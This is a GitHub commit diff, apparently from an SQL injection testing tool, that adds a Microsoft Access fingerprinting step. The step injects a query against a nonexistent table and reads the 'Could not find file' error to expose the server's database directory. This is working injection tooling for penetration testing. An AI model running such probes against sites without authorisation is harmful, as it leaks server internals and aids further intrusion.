Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 6ad8bbf

Browse files
stamparmstamparm
committed
one more ms access update
1 parent c98d8fe commit 6ad8bbf

1 file changed

Lines changed: 30 additions & 2 deletions

File tree

plugins/dbms/access/fingerprint.py

Lines changed: 30 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -14,6 +14,8 @@
1414
from lib.core.common import formatFingerprint
1515
from lib.core.common import getHtmlErrorFp
1616
from lib.core.common import randomInt
17+
from lib.core.common import randomStr
18+
from lib.core.common import wasLastRequestError
1719
from lib.core.data import conf
1820
from lib.core.data import kb
1921
from lib.core.data import logger
@@ -42,13 +44,13 @@ def __sandBoxCheck(self):
4244
payload = agent.payload(newValue=query)
4345
result = Request.queryPage(payload)
4446
retVal = "not sandboxed" if result else "sandboxed"
45-
47+
4648
return retVal
4749

4850
def __sysTablesCheck(self):
4951
infoMsg = "executing system table(s) existance fingerprint"
5052
logger.info(infoMsg)
51-
53+
5254
# Microsoft Access table reference updated on 01/2010
5355
sysTables = {
5456
"97": ("MSysModules2", "MSysAccessObjects"),
@@ -83,6 +85,30 @@ def __sysTablesCheck(self):
8385

8486
return None
8587

88+
def __getDatabaseDir(self):
89+
retVal = None
90+
91+
infoMsg = "searching for database directory"
92+
logger.info(infoMsg)
93+
94+
randInt = randomInt()
95+
randStr = randomStr()
96+
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
97+
query = agent.postfixQuery(query)
98+
payload = agent.payload(newValue=query)
99+
page = Request.queryPage(payload, content=True)
100+
101+
if wasLastRequestError():
102+
match = re.search("Could not find file\s+'([^']+?)'", page[0])
103+
104+
if match:
105+
retVal = match.group(1).rstrip("%s.mdb" % randStr)
106+
107+
if retVal.endswith('\\'):
108+
retVal = retVal[:-1]
109+
110+
return retVal
111+
86112
def getFingerprint(self):
87113
value = ""
88114
wsOsFp = formatFingerprint("web server", kb.headersFp)
@@ -120,6 +146,8 @@ def getFingerprint(self):
120146
if htmlErrorFp:
121147
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
122148

149+
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
150+
123151
return value
124152

125153
def checkDbms(self):

0 commit comments

Comments
 (0)